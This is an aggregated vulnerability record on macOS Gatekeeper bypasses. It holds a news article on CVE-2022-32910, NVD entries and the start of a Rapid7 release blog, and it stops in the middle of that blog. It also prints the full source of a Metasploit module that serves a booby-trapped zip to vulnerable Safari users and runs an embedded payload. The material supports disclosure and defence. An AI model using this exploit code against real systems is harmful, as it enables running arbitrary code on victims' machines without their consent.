Details Released for Recently Patched new macOS Archive Utility Vulnerability

2022-10-06T12:20:00

Description

[![macOS Archive Utility Vulnerability](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh_bGaWK8rcy2QKWG7Xuq4VBEffsgfDInoNBAISv6CT_exfy0ii_3WAmKPQKFrsOrwt1WiawgftmZDgz18pKv_3pRNE33JKmvGvEvCYRb7e9_TJRZFOqzhlCGRgw-gWhAUlGBMwKW_qkXOSmQGGr04R5JuzvqDx16Na9zpD695l4HaUtWLBOQogzntc/s728-e1000/macos.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh_bGaWK8rcy2QKWG7Xuq4VBEffsgfDInoNBAISv6CT_exfy0ii_3WAmKPQKFrsOrwt1WiawgftmZDgz18pKv_3pRNE33JKmvGvEvCYRb7e9_TJRZFOqzhlCGRgw-gWhAUlGBMwKW_qkXOSmQGGr04R5JuzvqDx16Na9zpD695l4HaUtWLBOQogzntc/s728-e100/macos.jpg>) Security researchers have shared details about a now-addressed security flaw in Apple's macOS operating system that could be potentially exploited to run malicious applications in a manner that can bypass Apple's security measures. The vulnerability, tracked as [CVE-2022-32910](<https://www.jamf.com/blog/jamf-threat-labs-macos-archive-utility-vulnerability/>), is rooted in the built-in Archive Utility and "could lead to the execution of an unsigned and unnotarized application without displaying security prompts to the user, by using a specially crafted archive," Apple device management firm [Jamf](<https://www.jamf.com/blog/jamf-threat-labs-macos-archive-utility-vulnerability/>) said in an analysis. Following responsible disclosure on May 31, 2022, Apple addressed the issue as part of [macOS Big Sur 11.6.8](<https://support.apple.com/en-us/HT213344>) and [Monterey 12.5](<https://support.apple.com/en-us/HT213345>) released on July 20, 2022. The tech giant, for its part, also revised the earlier-issued advisories as of October 4 to add an entry for the flaw. Apple described the bug as a logic issue that could allow an archive file to get around Gatekeeper checks, which is designed so as to ascertain that only trusted software runs on the operating system. The security technology achieves this by verifying that the downloaded package is from a legitimate developer and has been notarized by Apple – i.e., given a stamp of approval to ensure it's not been maliciously tampered with. [![Vulnerability](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhjAIy0uBtlihFi5MNLwqvoCJWzJcq_whjlFhhF-gQ3CyYtLeI7sMh4WzstBSeTgAnHm_DXK1wVYyn7syuHBLuS1d-ReIPCION05vQXC-sqJyAgjsE82K7EZ27nJlvJ7L_c6uMIZFPcto1NX78zAhrg0k6dHonf74LxixQe6RzrAPNsr0jLiMUjXhDCQw/s728-e1000/mac.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhjAIy0uBtlihFi5MNLwqvoCJWzJcq_whjlFhhF-gQ3CyYtLeI7sMh4WzstBSeTgAnHm_DXK1wVYyn7syuHBLuS1d-ReIPCION05vQXC-sqJyAgjsE82K7EZ27nJlvJ7L_c6uMIZFPcto1NX78zAhrg0k6dHonf74LxixQe6RzrAPNsr0jLiMUjXhDCQw/s728-e100/mac.jpg>) "Gatekeeper also requests user approval before opening downloaded software for the first time to make sure the user hasn't been tricked into running executable code they believed to simply be a data file," Apple [notes](<https://support.apple.com/en-in/guide/deployment/dep323ab8aa3/web>) in its support documentation. It's also worth noting archive files downloaded from the internet are tagged with the "com.apple.quarantine" extended attribute, including the items within the file, so as to trigger a Gatekeeper check prior to execution. But in a peculiar quirk discovered by Jamf, it was found that the Archive Utility fails to add the quarantine attribute to a folder "when extracting an archive containing two or more files or folders in its root directory." Thus by creating an archive file with the extension "exploit.app.zip," it leads to a scenario where an unarchival results in the creation of a folder titled "exploit.app," while also lacking the quarantine attribute. This application "will bypass all Gatekeeper checks allowing an unnotarized and/or unsigned binary to execute," Jamf researcher Ferdous Saljooki, who discovered the flaw, said. Apple said it resolved the vulnerability with improved checks. The findings come more than six months after Apple addressed [another similar flaw](<https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/>) in macOS Catalina, Big Sur 11.6.5, and Monterey 12.3 ([CVE-2022-22616](<https://nvd.nist.gov/vuln/detail/CVE-2022-22616>)) that could allow a malicious ZIP archive to bypass Gatekeeper checks. Found this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter __](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.

{"id": "THN:D49EB15A8EC646123A52948B0E3A1F24", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "Details Released for Recently Patched new macOS Archive Utility Vulnerability", "description": "[![macOS Archive Utility Vulnerability](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh_bGaWK8rcy2QKWG7Xuq4VBEffsgfDInoNBAISv6CT_exfy0ii_3WAmKPQKFrsOrwt1WiawgftmZDgz18pKv_3pRNE33JKmvGvEvCYRb7e9_TJRZFOqzhlCGRgw-gWhAUlGBMwKW_qkXOSmQGGr04R5JuzvqDx16Na9zpD695l4HaUtWLBOQogzntc/s728-e1000/macos.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh_bGaWK8rcy2QKWG7Xuq4VBEffsgfDInoNBAISv6CT_exfy0ii_3WAmKPQKFrsOrwt1WiawgftmZDgz18pKv_3pRNE33JKmvGvEvCYRb7e9_TJRZFOqzhlCGRgw-gWhAUlGBMwKW_qkXOSmQGGr04R5JuzvqDx16Na9zpD695l4HaUtWLBOQogzntc/s728-e100/macos.jpg>)\n\nSecurity researchers have shared details about a now-addressed security flaw in Apple's macOS operating system that could be potentially exploited to run malicious applications in a manner that can bypass Apple's security measures.\n\nThe vulnerability, tracked as [CVE-2022-32910](<https://www.jamf.com/blog/jamf-threat-labs-macos-archive-utility-vulnerability/>), is rooted in the built-in Archive Utility and \"could lead to the execution of an unsigned and unnotarized application without displaying security prompts to the user, by using a specially crafted archive,\" Apple device management firm [Jamf](<https://www.jamf.com/blog/jamf-threat-labs-macos-archive-utility-vulnerability/>) said in an analysis.\n\nFollowing responsible disclosure on May 31, 2022, Apple addressed the issue as part of [macOS Big Sur 11.6.8](<https://support.apple.com/en-us/HT213344>) and [Monterey 12.5](<https://support.apple.com/en-us/HT213345>) released on July 20, 2022. The tech giant, for its part, also revised the earlier-issued advisories as of October 4 to add an entry for the flaw.\n\nApple described the bug as a logic issue that could allow an archive file to get around Gatekeeper checks, which is designed so as to ascertain that only trusted software runs on the operating system.\n\nThe security technology achieves this by verifying that the downloaded package is from a legitimate developer and has been notarized by Apple \u2013 i.e., given a stamp of approval to ensure it's not been maliciously tampered with.\n\n[![Vulnerability](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhjAIy0uBtlihFi5MNLwqvoCJWzJcq_whjlFhhF-gQ3CyYtLeI7sMh4WzstBSeTgAnHm_DXK1wVYyn7syuHBLuS1d-ReIPCION05vQXC-sqJyAgjsE82K7EZ27nJlvJ7L_c6uMIZFPcto1NX78zAhrg0k6dHonf74LxixQe6RzrAPNsr0jLiMUjXhDCQw/s728-e1000/mac.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhjAIy0uBtlihFi5MNLwqvoCJWzJcq_whjlFhhF-gQ3CyYtLeI7sMh4WzstBSeTgAnHm_DXK1wVYyn7syuHBLuS1d-ReIPCION05vQXC-sqJyAgjsE82K7EZ27nJlvJ7L_c6uMIZFPcto1NX78zAhrg0k6dHonf74LxixQe6RzrAPNsr0jLiMUjXhDCQw/s728-e100/mac.jpg>)\n\n\"Gatekeeper also requests user approval before opening downloaded software for the first time to make sure the user hasn't been tricked into running executable code they believed to simply be a data file,\" Apple [notes](<https://support.apple.com/en-in/guide/deployment/dep323ab8aa3/web>) in its support documentation.\n\nIt's also worth noting archive files downloaded from the internet are tagged with the \"com.apple.quarantine\" extended attribute, including the items within the file, so as to trigger a Gatekeeper check prior to execution.\n\nBut in a peculiar quirk discovered by Jamf, it was found that the Archive Utility fails to add the quarantine attribute to a folder \"when extracting an archive containing two or more files or folders in its root directory.\"\n\nThus by creating an archive file with the extension \"exploit.app.zip,\" it leads to a scenario where an unarchival results in the creation of a folder titled \"exploit.app,\" while also lacking the quarantine attribute.\n\nThis application \"will bypass all Gatekeeper checks allowing an unnotarized and/or unsigned binary to execute,\" Jamf researcher Ferdous Saljooki, who discovered the flaw, said. Apple said it resolved the vulnerability with improved checks.\n\nThe findings come more than six months after Apple addressed [another similar flaw](<https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/>) in macOS Catalina, Big Sur 11.6.5, and Monterey 12.3 ([CVE-2022-22616](<https://nvd.nist.gov/vuln/detail/CVE-2022-22616>)) that could allow a malicious ZIP archive to bypass Gatekeeper checks.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2022-10-06T12:20:00", "modified": "2022-10-07T05:13:21", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, "href": "https://thehackernews.com/2022/10/details-released-for-recently-patched.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2022-22616", "CVE-2022-32910"], "immutableFields": [], "lastseen": "2022-10-07T06:04:54", "viewCount": 38, "enchantments": {"dependencies": {"references": [{"type": "apple", "idList": ["APPLE:315A0A489FE54A17BA14F0B62D49D716", "APPLE:71C798D0F46D1E956B1D27B4A004E9B9", "APPLE:8BB162E4A512616135B4203D7F1AA9CD", "APPLE:A07531C05C19836B4B65E06C7D7BB300", "APPLE:AC49D86768B40C9859AF7DC3073E5DAF", "APPLE:C9EF751487C406A634B9CBD013ECD410"]}, {"type": "cve", "idList": ["CVE-2022-22616"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-OSX-BROWSER-OSX_GATEKEEPER_BYPASS-"]}, {"type": "nessus", "idList": ["MACOS_HT213183.NASL", "MACOS_HT213184.NASL", "MACOS_HT213185.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:FF690F32AA83905D50C2FF923E9DD339"]}]}, "score": {"value": 1.4, "vector": "NONE"}, "epss": [{"cve": "CVE-2022-22616", "epss": "0.000480000", "percentile": "0.144590000", "modified": "2023-03-19"}, {"cve": "CVE-2022-32910", "epss": "0.000550000", "percentile": "0.207380000", "modified": "2023-03-19"}], "vulnersScore": 1.4}, "_state": {"dependencies": 1665122930, "score": 1665124609, "epss": 1679305952}, "_internal": {"score_hash": "45e76cba89dae0c069f538c97a1472b4"}}

{"cve": [{"lastseen": "2023-02-09T14:29:23", "description": "A logic issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.8, macOS Monterey 12.5, Security Update 2022-005 Catalina. An archive may be able to bypass Gatekeeper.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-11-01T20:15:00", "type": "cve", "title": "CVE-2022-32910", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-32910"], "modified": "2022-11-03T12:43:00", "cpe": ["cpe:/o:apple:mac_os_x:10.15.7"], "id": "CVE-2022-32910", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-32910", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-006:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-007:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:-:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-005:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-008:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-005:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-004:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-003:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-003:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-004:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-002:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-007:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:09:13", "description": "This issue was addressed with improved checks. This issue is fixed in Security Update 2022-003 Catalina, macOS Monterey 12.3, macOS Big Sur 11.6.5. A maliciously crafted ZIP archive may bypass Gatekeeper checks.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-05-26T18:15:00", "type": "cve", "title": "CVE-2022-22616", "cwe": ["CWE-863"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22616"], "modified": "2022-06-08T02:36:00", "cpe": ["cpe:/o:apple:mac_os_x:10.15.7"], "id": "CVE-2022-22616", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22616", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-006:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-007:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:-:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-008:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-005:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-003:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-002:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:supplemental_update:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-007:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-002:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2022-10-31T20:48:21", "description": "This module exploits two CVEs that bypass Gatekeeper. For CVE-2021-30657, this module serves an OSX app (as a zip) that contains no Info.plist, which bypasses gatekeeper in macOS < 11.3. If the user visits the site on Safari, the zip file is automatically extracted, and clicking on the downloaded file will automatically launch the payload. If the user visits the site in another browser, the user must click once to unzip the app, and click again in order to execute the payload. For CVE-2022-22616, this module serves a gzip-compressed zip file with its file header pointing to the `Contents` directory which contains an OSX app. If the user downloads the file via Safari, Safari will automatically decompress the file, removing its `com.apple.quarantine` attribute. Because of this, the file will not require quarantining, bypassing Gatekeeper on MacOS versions below 12.3.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-04-26T21:59:14", "type": "metasploit", "title": "macOS Gatekeeper check bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30657", "CVE-2022-22616"], "modified": "2022-04-05T15:31:51", "id": "MSF:EXPLOIT-OSX-BROWSER-OSX_GATEKEEPER_BYPASS-", "href": "https://www.rapid7.com/db/modules/exploit/osx/browser/osx_gatekeeper_bypass/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'macOS Gatekeeper check bypass',\n 'Description' => %q{\n This module exploits two CVEs that bypass Gatekeeper.\n\n For CVE-2021-30657, this module serves an OSX app (as a zip) that contains no\n Info.plist, which bypasses gatekeeper in macOS < 11.3.\n If the user visits the site on Safari, the zip file is automatically extracted,\n and clicking on the downloaded file will automatically launch the payload.\n If the user visits the site in another browser, the user must click once to unzip\n the app, and click again in order to execute the payload.\n\n For CVE-2022-22616, this module serves a gzip-compressed zip file with its file header pointing\n to the `Contents` directory which contains an OSX app. If the user downloads the file via Safari,\n Safari will automatically decompress the file, removing its `com.apple.quarantine` attribute.\n Because of this, the file will not require quarantining, bypassing Gatekeeper on\n MacOS versions below 12.3.\n },\n 'License' => MSF_LICENSE,\n 'Targets' => [\n [ 'macOS x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],\n [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],\n [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2021-03-25',\n 'Author' => [\n 'Cedric Owens', # CVE-2021-30657 Discovery\n 'timwr', # Module\n 'Ferdous Saljooki', # CVE-2022-22616 Discovery (@malwarezoo)\n 'Jaron Bradley', # CVE-2022-22616 Discovery (@jbradley89)\n 'Mickey Jin', # CVE-2022-22616 Discovery (@patch1t)\n 'Shelby Pace' # CVE-2022-22616 Additions\n ],\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]\n },\n 'References' => [\n ['CVE', '2021-30657'],\n ['CVE', '2022-22616'],\n ['URL', 'https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508'],\n ['URL', 'https://objective-see.com/blog/blog_0x64.html'],\n ['URL', 'https://jhftss.github.io/CVE-2022-22616-Gatekeeper-Bypass/'],\n ['URL', 'https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/']\n ]\n )\n )\n register_options([\n OptString.new('APP_NAME', [false, 'The application name (Default: app)', 'app']),\n OptEnum.new('CVE', [true, 'The vulnerability to exploit', 'CVE-2022-22616', ['CVE-2021-30657', 'CVE-2022-22616']])\n ])\n end\n\n def cve\n datastore['CVE']\n end\n\n def check_useragent(user_agent)\n safari_version = nil\n if user_agent =~ %r{Version/(\\d+\\.\\d+(\\.\\d+)*)\\sSafari}\n safari_version = Regexp.last_match(1)\n end\n\n if safari_version && Rex::Version.new(safari_version) < Rex::Version.new('15.4') && cve == 'CVE-2022-22616'\n print_good(\"Safari version #{safari_version} is vulnerable\")\n return true\n end\n\n return false unless user_agent =~ /Intel Mac OS X (.*?)\\)/\n\n osx_version = Regexp.last_match(1).gsub('_', '.')\n mac_osx_version = Rex::Version.new(osx_version)\n if mac_osx_version >= Rex::Version.new('12.3')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n elsif mac_osx_version < Rex::Version.new('10.15.6')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n else\n print_good \"macOS version #{mac_osx_version} is vulnerable\"\n return true\n end\n\n false\n end\n\n def on_request_uri(cli, request)\n user_agent = request['User-Agent']\n print_status(\"Request #{request.uri} from #{user_agent}\")\n unless check_useragent(user_agent)\n print_error 'Unexpected User-Agent'\n send_not_found(cli)\n return\n end\n\n app_name = datastore['APP_NAME'] || Rex::Text.rand_text_alpha(5)\n\n app_file_name = \"#{app_name}.zip\"\n zipped = app_zip(app_name)\n\n if cve == 'CVE-2022-22616'\n zipped = Rex::Text.gzip(zipped)\n app_file_name = \"#{app_file_name}.gz\"\n end\n\n send_response(cli, zipped, { 'Content-Type' => 'application/zip', 'Content-Disposition' => \"attachment; filename=\\\"#{app_file_name}\\\"\" })\n end\n\n def app_zip(app_name)\n case target['Arch']\n when ARCH_X64\n payload_data = Msf::Util::EXE.to_python_reflection(framework, ARCH_X64, payload.encoded, {})\n command = \"echo \\\"#{payload_data}\\\" | python & disown\"\n when ARCH_PYTHON\n command = \"echo \\\"#{payload.encoded}\\\" | python\"\n when ARCH_CMD\n command = payload.encoded\n end\n\n shell_script = <<~SCRIPT\n #!/bin/sh\n\n #{command}\n SCRIPT\n\n zip = Rex::Zip::Archive.new\n zip.add_file(\"#{app_name}.app/\", '') if cve != 'CVE-2022-22616'\n zip.add_file(\"#{app_name}.app/Contents/\", '')\n zip.add_file(\"#{app_name}.app/Contents/MacOS/\", '')\n zip.add_file(\"#{app_name}.app/Contents/MacOS/#{app_name}\", shell_script).last.attrs = 0o777\n zip.pack\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/browser/osx_gatekeeper_bypass.rb", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "rapid7blog": [{"lastseen": "2022-04-09T18:43:30", "description": "## Windows Local Privilege Escalation for standard users\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2022/04/metasploit-blg-3-copy-1.png)\n\nIn this week\u2019s release, we have an exciting new module that has been added by our very own [Grant Willcox](<https://github.com/gwillcox-r7>) which exploits (CVE-2022-26904)[<https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904>], and allows for normal users to execute code as `NT AUTHORITY/SYSTEM` on Windows machines from Windows 7 up to and including Windows 11. Currently, the vulnerability is still not patched and there have not been any updates from MSRC regarding this vulnerability, however it may be patched in the next Patch Tuesday.\n\nThis exploit requires more than one local user to be present on the machine and the `PromptOnSecureDesktop` setting to be set to 1, which is the default setting.\n\n## MacOS exploitation\n\nOur very own [space-r7](<https://github.com/space-r7>) has updated the recent `GateKeeper` module to add support for the recent CVE-2022-22616, which can be used to target all MacOS Catalina versions, and MacOS Monterey versions prior to 12.3.\n\nThis module can be used to remove the `com.apple.quarantine` extended attribute on a downloaded/extracted file and allows for code to be executed on the machine.\n\n## Enumerating Chocolatey applications\n\nThis week\u2019s release also features a new module from a first-time contributor [rad10](<https://github.com/rad10>), which will enumerate all applications that have been installed using Chocolatey.\n\nThis could be used when gathering information about a compromised target and potentially vulnerable software present on the machine.\n\n## New module content (5)\n\n * [User Profile Arbitrary Junction Creation Local Privilege Elevation](<https://github.com/rapid7/metasploit-framework/pull/16382>) by Grant Willcox and KLINIX5, which exploits [CVE-2022-26904](<https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904?referrer=blog>) \\- This adds an exploit for CVE-2022-26904, which is an LPE vulnerability affecting Windows 7 through Windows 11. Leveraging this vulnerability can allow a local attacker running as a standard user, who has knowledge of another standard user's credentials, to execute code as `NT AUTHORITY\\SYSTEM`. The `PromptOnSecureDesktop` setting must also be set to `1` on the affected machine for this exploit to work, which is the default setting.\n * [ALLMediaServer 1.6 SEH Buffer Overflow](<https://github.com/rapid7/metasploit-framework/pull/16399>) by Hejap Zairy Al-Sharif, which exploits [CVE-2022-28381](<https://attackerkb.com/topics/TSnBdUJwnJ/cve-2022-28381?referrer=blog>) \\- A new module has been added in which exploits CVE-2022-28381, a remotely exploitable SEH buffer overflow vulnerability in AllMediaServer version 1.6 and prior. Successful exploitation results in remote code execution as the user running AllMediaServer.\n * [Windows Gather Installed Application Within Chocolatey Enumeration](<https://github.com/rapid7/metasploit-framework/pull/16381>) by Nick Cottrell - This adds a post module that enumerates applications installed with Chocolatey on Windows systems.\n * [#16082](<https://github.com/rapid7/metasploit-framework/pull/16082>) from [usiegl00](<https://github.com/usiegl00>) \\- This updates the `shadow_mitm_dispatcher` module by adding a new RubySMB Dispatcher, whichallows a better integration with RubySMB and enables the use of all the features provided by its client. Both SMBv2 and SMBv3 are now supported.\n * [#16401](<https://github.com/rapid7/metasploit-framework/pull/16401>) from [space-r7](<https://github.com/space-r7>) \\- This change adds support for CVE-2022-22616 to the existing Gatekeeper bypass exploit module which reportedly covers macOS Catalina all the way to MacOS Monterey versions below 12.3. Since this now targets two CVEs, we've introduced a new CVE option to select which CVE to exploit. This default is the most recent CVE.\n\n## Enhancements and features (4)\n\n * [#15972](<https://github.com/rapid7/metasploit-framework/pull/15972>) from [sempervictus](<https://github.com/sempervictus>) \\- This updates the Log4shell scanner with the `LEAK_PARAMS` option, providing a way to leak more target information such as environment variables.\n * [#16320](<https://github.com/rapid7/metasploit-framework/pull/16320>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This updates Windows Meterpreter payloads to support a new `MeterpreterDebugBuild` datastore option. When set to true the generated payload will have additional logging support which is visible via Window's DbgView program.\n * [#16373](<https://github.com/rapid7/metasploit-framework/pull/16373>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds initial support for Ruby 3.1\n * [#16403](<https://github.com/rapid7/metasploit-framework/pull/16403>) from [sempervictus](<https://github.com/sempervictus>) \\- This adds more checks to the `post/windows/gather/checkvm` module to better detect if the current target is a Qemu / KVM virtual machine.\n\n## Bugs fixed (3)\n\n * [#16398](<https://github.com/rapid7/metasploit-framework/pull/16398>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- A number of recent payload adds did not conform to the patterns used for suggesting spec configurations. Tests for these payloads have now been manually added to ensure they will be appropriately tested as part of `rspec` checks.\n * [#16408](<https://github.com/rapid7/metasploit-framework/pull/16408>) from [rtpt-alexanderneumann](<https://github.com/rtpt-alexanderneumann>) \\- This fixes an edge case with the `multi/postgres/postgres_copy_from_program_cmd_exec` module, which crashed when the randomly generated table name started with a number\n * [#16419](<https://github.com/rapid7/metasploit-framework/pull/16419>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- A bug has been fixed whereby when using the `search` command and searching by `disclosure_date`, the help menu would instead appear. This has been remedied by improving the date handling logic for the `search` command.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.1.36...6.1.37](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-03-31T11%3A00%3A06-05%3A00..2022-04-07T12%3A52%3A39-04%3A00%22>)\n * [Full diff 